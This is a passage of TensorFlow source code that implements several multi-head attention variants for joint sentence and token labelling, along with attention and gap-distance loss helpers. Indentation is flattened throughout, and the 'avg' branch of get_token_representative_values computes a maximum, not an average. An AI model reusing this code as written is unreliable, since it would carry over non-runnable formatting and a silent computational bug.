processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from attention weights.
token_scores = tf.transpose(
attention_weights_unnormalized, [0, 2, 1]) # [num_heads*B, M, 1]
token_scores = tf.concat(
tf.split(token_scores, num_heads), axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.concat(
tf.split(tf.transpose(attention_weights, [0, 2, 1]), num_heads),
axis=-1) # [B, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
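# Illustrative sketch (not part of the model): the tf.split/tf.concat pattern
# used above to stack per-head slices along the batch axis, and its inverse.
# Head h of batch element b lands at row h*B + b of the first axis.
def _split_heads(x, num_heads):
    import numpy as np
    # [B, M, U] -> [B*num_heads, M, U/num_heads]
    return np.concatenate(np.split(x, num_heads, axis=2), axis=0)

def _merge_heads(x, num_heads):
    import numpy as np
    # [B*num_heads, M, U/num_heads] -> [B, M, U]
    return np.concatenate(np.split(x, num_heads, axis=0), axis=2)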
def variant_3(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
attention_size,
sentence_lengths,
scoring_activation=None,
separate_heads=True):
"""
Variant 3 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_3"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Trainable parameters
w_omega = tf.Variable(
tf.random_normal([num_heads, num_units, attention_size],
stddev=0.1)) # [num_heads, num_units, A]
b_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))
u_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))
# Computing the attention score, of shape [B, M, H, A].
attention_evidence = tf.tanh(tf.tensordot(inputs, w_omega, axes=[[2], [1]]) + b_omega)
attention_evidence = tf.tensordot(
attention_evidence, u_omega, axes=[[-1], [0]],
name='attention_evidence_score') # [B, M, H]
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights_unnormalized = tf.nn.sigmoid(attention_evidence)
elif attention_activation == "sharp":
attention_weights_unnormalized = tf.math.exp(attention_evidence)
elif attention_activation == "linear":
attention_weights_unnormalized = attention_evidence
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
tiled_sentence_lengths = tf.tile(
input=tf.expand_dims(
tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_heads])
attention_weights_unnormalized = tf.where(
tiled_sentence_lengths,
attention_weights_unnormalized,
tf.zeros_like(attention_weights_unnormalized))
attention_weights = attention_weights_unnormalized / tf.reduce_sum(
attention_weights_unnormalized, axis=1, keep_dims=True) # [B, M, H]
# Prepare alphas and input.
attention_weights = tf.transpose(attention_weights, [0, 2, 1]) # [B, H, M]
inputs = tf.tile(
input=tf.expand_dims(inputs, axis=1),
multiples=[1, num_heads, 1, 1]) # [B, H, M, E]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, H, M, E]
output = tf.reduce_sum(product, axis=2) # [B, H, E]
processed_tensor = tf.squeeze(tf.layers.dense(
inputs=output, units=1,
kernel_initializer=initializer), axis=-1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
token_scores = attention_weights_unnormalized # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
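# Illustrative sketch (not part of the model): the additive scoring used in
# variant_3, score[b, m, h] = u . tanh(inputs[b, m] @ w[h] + b), with numpy
# tensordot axes matching tf.tensordot(inputs, w_omega, axes=[[2], [1]]).
def _demo_additive_scores(inputs, w_omega, b_omega, u_omega):
    import numpy as np
    evidence = np.tanh(
        np.tensordot(inputs, w_omega, axes=([2], [1])) + b_omega)  # [B, M, H, A]
    return np.tensordot(evidence, u_omega, axes=([3], [0]))        # [B, M, H]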
def variant_4(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
token_scoring_method="max",
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 4 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_4"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights_unnormalized = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights_unnormalized = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights_unnormalized = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = mask( # [B*num_heads, M, M]
attention_weights_unnormalized, queries, keys, mask_type="query")
# Obtain token scores from attention weights. Shape is [B*num_heads, M].
if token_scoring_method == "sum":
attention_weights_unnormalized = tf.reduce_sum(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "max":
attention_weights_unnormalized = tf.reduce_max(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "avg":
attention_weights_unnormalized = tf.reduce_mean(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "logsumexp":
attention_weights_unnormalized = tf.reduce_logsumexp(
attention_weights_unnormalized, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
# Normalize to obtain attention weights.
attention_weights = attention_weights_unnormalized / tf.reduce_sum(
attention_weights_unnormalized, axis=1, keep_dims=True)
token_scores = tf.concat(
tf.split(tf.expand_dims(attention_weights_unnormalized, axis=2), num_heads),
axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
if use_inputs_instead_values:
product = tf.reduce_sum(inputs * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
else:
product = tf.reduce_sum(values * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
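# Illustrative sketch (not part of the model): zeroing padded positions and
# renormalizing, as done above with tf.where on tf.sequence_mask followed by
# division by the reduced sum. Operates on one head's [M] score vector.
def _demo_masked_normalize(scores, sentence_length):
    import numpy as np
    mask = np.arange(scores.shape[0]) < sentence_length
    masked = np.where(mask, scores, 0.0)
    return masked / masked.sum()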
def variant_5(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
token_scoring_method="max",
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 5 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_5"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Obtain token scores from attention weights. Shape is [B*num_heads, M].
if token_scoring_method == "sum":
attention_evidence = tf.reduce_sum(
attention_evidence, axis=1)
elif token_scoring_method == "max":
attention_evidence = tf.reduce_max(
attention_evidence, axis=1)
elif token_scoring_method == "avg":
attention_evidence = tf.reduce_mean(
attention_evidence, axis=1)
elif token_scoring_method == "logsumexp":
attention_evidence = tf.reduce_logsumexp(
attention_evidence, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
# Apply a non-linear layer to obtain un-normalized attention weights.
if attention_activation == "soft":
attention_weights_unnormalized = tf.nn.sigmoid(attention_evidence)
elif attention_activation == "sharp":
attention_weights_unnormalized = tf.math.exp(attention_evidence)
elif attention_activation == "linear":
attention_weights_unnormalized = attention_evidence
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
tiled_sentence_lengths = tf.tile(
input=tf.sequence_mask(sentence_lengths), multiples=[num_heads, 1])
attention_weights_unnormalized = tf.where(
tiled_sentence_lengths,
attention_weights_unnormalized,
tf.zeros_like(attention_weights_unnormalized))
# Normalize to obtain attention weights of shape [B*num_heads, M].
attention_weights = attention_weights_unnormalized / tf.reduce_sum(
attention_weights_unnormalized, axis=1, keep_dims=True)
token_scores = tf.concat(
tf.split(tf.expand_dims(attention_weights_unnormalized, axis=2), num_heads),
axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
if use_inputs_instead_values:
product = tf.reduce_sum(inputs * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
else:
product = tf.reduce_sum(values * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def variant_6(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
scoring_activation=None,
token_scoring_method="max",
separate_heads=True):
"""
Variant 6 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_6"):
num_units = inputs.get_shape().as_list()[-1]
keys_list = []
queries_list = []
values_list = []
for i in range(num_heads):
with tf.variable_scope("num_head_{}".format(i), reuse=tf.AUTO_REUSE):
keys_this_head = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
queries_this_head = tf.layers.dense(
inputs, num_units, activation=tf.nn.relu,
kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=0.7),
kernel_initializer=initializer) # [B, M, num_units]
values_this_head = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys_list.append(keys_this_head)
queries_list.append(queries_this_head)
values_list.append(values_this_head)
keys = tf.stack(keys_list) # [num_heads, B, M, num_units]
queries = tf.stack(queries_list) # [num_heads, B, M, num_units]
values = tf.stack(values_list) # [num_heads, B, M, num_units]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 1, 3, 2])) # [num_heads, B, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask_2(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask_2(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask_2(
attention_weights_unnormalized, queries, keys, mask_type="query")
# [num_heads, B, M, num_units]
product = tf.matmul(attention_weights, values)
product = tf.reduce_sum(product, axis=2) # [num_heads, B, num_units]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [num_heads, B, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [num_heads, B, 1]
processed_tensor = tf.transpose(
tf.squeeze(processed_tensor, axis=-1), [1, 0]) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from attention weights. Shape is [num_heads, B, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(attention_weights_unnormalized, axis=2)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(attention_weights_unnormalized, axis=2)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(attention_weights_unnormalized, axis=2)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(attention_weights_unnormalized, axis=2)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.transpose(token_scores, [1, 2, 0]) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.transpose(attention_weights, [1, 2, 3, 0]) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
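# Illustrative sketch (not part of the model): the three attention
# activations ("soft", "sharp", "linear") used throughout these variants,
# applied to one row of attention evidence.
def _demo_attention_activation(evidence_row, attention_activation):
    import numpy as np
    if attention_activation == "soft":
        return 1.0 / (1.0 + np.exp(-evidence_row))  # sigmoid
    if attention_activation == "sharp":
        return np.exp(evidence_row)
    if attention_activation == "linear":
        return evidence_row
    raise ValueError("Unknown/unsupported attention activation: %s."
                     % attention_activation)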
def get_token_representative_values(token_probabilities, approach):
"""
Obtains the token probabilities representative for each head across the sentence.
:param token_probabilities: the softmaxed token scores.
:param approach: how to get the representations (max, avg, log).
:return: token_representative_values of shape [batch_size, num_heads].
"""
if "max" in approach:
token_representative_values = tf.reduce_max(
token_probabilities, axis=1)
elif "avg" in approach:
token_representative_values = tf.reduce_max(
token_probabilities, axis=1)
elif "log" in approach:
token_representative_values = tf.reduce_logsumexp(
token_probabilities, axis=1)
else:
raise ValueError("Unknown approach for getting "
"token representative values: %s." % approach)
return token_representative_values # [B, num_heads]
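# Illustrative sketch (not part of the model): the intended pooling over the
# sentence axis of a [B, M, num_heads] tensor, one branch per approach.
def _demo_representative_values(token_probabilities, approach):
    import numpy as np
    if "max" in approach:
        return token_probabilities.max(axis=1)
    if "avg" in approach:
        return token_probabilities.mean(axis=1)
    if "log" in approach:
        m = token_probabilities.max(axis=1)
        return m + np.log(
            np.exp(token_probabilities - m[:, None, :]).sum(axis=1))
    raise ValueError("Unknown approach: %s." % approach)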
def get_one_hot_of_token_labels_length(
sentence_labels, num_sent_labels, num_tok_labels):
"""
Obtains one-hot sentence representations.
:param sentence_labels: ground truth sentence labels.
:param num_sent_labels: total number of unique sentence labels.
:param num_tok_labels: total number of unique token labels.
:return: one hot sentence labels, corresponding to the token labels.
"""
one_hot_sentence_labels = tf.one_hot(
tf.cast(sentence_labels, tf.int64),
depth=num_sent_labels)
if num_sent_labels == 2 and num_sent_labels != num_tok_labels:
# Get the default and non-default sentence labels.
default_sentence_labels = tf.gather(
one_hot_sentence_labels, indices=[0], axis=-1) # [B, 1]
non_default_sentence_labels = tf.gather(
one_hot_sentence_labels, indices=[1], axis=-1) # [B, 1]
# Tile the non-default one (num_tok_labels - 1) times.
tiled_non_default_sentence_labels = tf.tile(
input=non_default_sentence_labels,
multiples=[1, num_tok_labels - 1])
# Get one-hot sentence labels of shape [B, num_tok_labels].
one_hot_sentence_labels = tf.concat(
[default_sentence_labels, tiled_non_default_sentence_labels],
axis=-1, name="one_hot_sentence_labels_concatenation")
return one_hot_sentence_labels # [B, num_tok_labels]
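# Illustrative sketch (not part of the model): how a binary sentence label is
# stretched to token-label length -- position 0 keeps the default indicator,
# the non-default indicator is tiled over the remaining positions.
def _demo_one_hot_token_length(sentence_label, num_tok_labels):
    import numpy as np
    one_hot = np.eye(2)[sentence_label]  # [2]
    return np.concatenate(
        [one_hot[:1], np.repeat(one_hot[1:], num_tok_labels - 1)])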
def compute_attention_loss(
token_probabilities, sentence_labels,
num_sent_labels, num_tok_labels,
approach, compute_pairwise=False):
"""
Attention-level loss -- currently, implementation possible only in two cases:
1. The number of sentence labels is equal to the number of token labels.
In this case, the attention loss is computed element-wise (for each label).
2. The number of sentence labels is 2, while the number of tokens is arbitrary.
In this case, two scores are computed from the token scores:
* one corresponding to the default label
* one corresponding to the rest of labels (non-default labels)
:param token_probabilities: 3D tensor, shape [B, M, num_tok_labels]
that are normalized across heads (last axis).
:param sentence_labels: ground-truth sentence labels, shape [B].
:param num_sent_labels: number of unique sentence labels.
:param num_tok_labels: number of unique token labels.
:param approach: method to extract token representation values.
:param compute_pairwise: whether to compute the loss pairwise or not.
:return: a number representing the sum over attention losses computed.
"""
if num_sent_labels == num_tok_labels or num_sent_labels == 2:
# Compute the token representations based on the approach selected.
token_representative_values = get_token_representative_values(
token_probabilities, approach) # [B, num_heads]
one_hot_sentence_labels = get_one_hot_of_token_labels_length(
sentence_labels, num_sent_labels, num_tok_labels)
if compute_pairwise:
attention_loss = tf.losses.mean_pairwise_squared_error(
labels=label_smoothing(one_hot_sentence_labels, epsilon=0.15),
predictions=token_representative_values, weights=1.15)
else:
attention_loss = tf.square(
token_representative_values -
label_smoothing(one_hot_sentence_labels, epsilon=0.15))
else:
raise ValueError(
"You have different number of token labels (%d) and "
"sentence labels (%d, which is non-binary). "
"We don't support attention loss for such a case!"
% (num_tok_labels, num_sent_labels))
return attention_loss
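# Illustrative sketch (not part of the model): the element-wise attention
# loss against smoothed labels. `label_smoothing` is defined elsewhere in
# this codebase; the usual definition, assumed here, is y*(1-eps) + eps/K
# for K classes.
def _demo_attention_loss(values, one_hot_labels, epsilon=0.15):
    import numpy as np
    k = one_hot_labels.shape[-1]
    smoothed = one_hot_labels * (1.0 - epsilon) + epsilon / k
    return (values - smoothed) ** 2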
def compute_gap_distance_loss(
token_probabilities, sentence_labels,
num_sent_labels, num_tok_labels,
minimum_gap_distance, approach,
type_distance):
"""
Gap-distance loss: the intuition is that the gap between the default
and non-default scores should be wider than a certain threshold.
:param token_probabilities: 3D tensor, shape [B, M, num_tok_labels]
that are normalized across heads (last axis).
:param sentence_labels: ground-truth sentence labels, shape [B].
:param num_sent_labels: number of unique sentence labels.
:param num_tok_labels: number of unique token labels.
:param minimum_gap_distance: the minimum distance gap imposed between
scores corresponding to the default or non-default gold sentence label.
:param approach: method to extract token representation values.
:param type_distance: type of gap distance loss that you want.
:return: a number representing the sum over gap-distance losses.
"""
if num_sent_labels == num_tok_labels or num_sent_labels == 2:
# Compute the token representations based on the approach selected.
token_representative_values = get_token_representative_values(
token_probabilities, approach) # [B, num_heads]
one_hot_sentence_labels = get_one_hot_of_token_labels_length(
sentence_labels, num_sent_labels, num_tok_labels)
valid_tokens = tf.multiply(
tf.cast(one_hot_sentence_labels, tf.float32),
token_representative_values) # [B, num_tok_labels]
tokens_default_head_correct = tf.squeeze(tf.gather(
valid_tokens, indices=[0], axis=-1), axis=-1) # [B]
tokens_default_head_incorrect = tf.squeeze(tf.gather(
token_representative_values, indices=[0], axis=-1), axis=-1) # [B]
tokens_non_default_head_correct = tf.squeeze(
tf.reduce_max(tf.gather(
valid_tokens,
indices=[[i] for i in range(1, num_tok_labels)],
axis=-1), axis=1), axis=-1)
tokens_non_default_head_incorrect = tf.squeeze(
tf.reduce_max(tf.gather(
token_representative_values,
indices=[[i] for i in range(1, num_tok_labels)],
axis=-1), axis=1), axis=-1)
heads_correct = tf.stack(
[tokens_default_head_correct, tokens_non_default_head_correct],
axis=-1) # [B, 2]
heads_incorrect = tf.stack(
[tokens_default_head_incorrect, tokens_non_default_head_incorrect],
axis=-1) # [B, 2]
y_heads = tf.where(
tf.equal(tf.cast(tokens_non_default_head_correct, tf.int32), 0),
one_hot_sentence_labels,
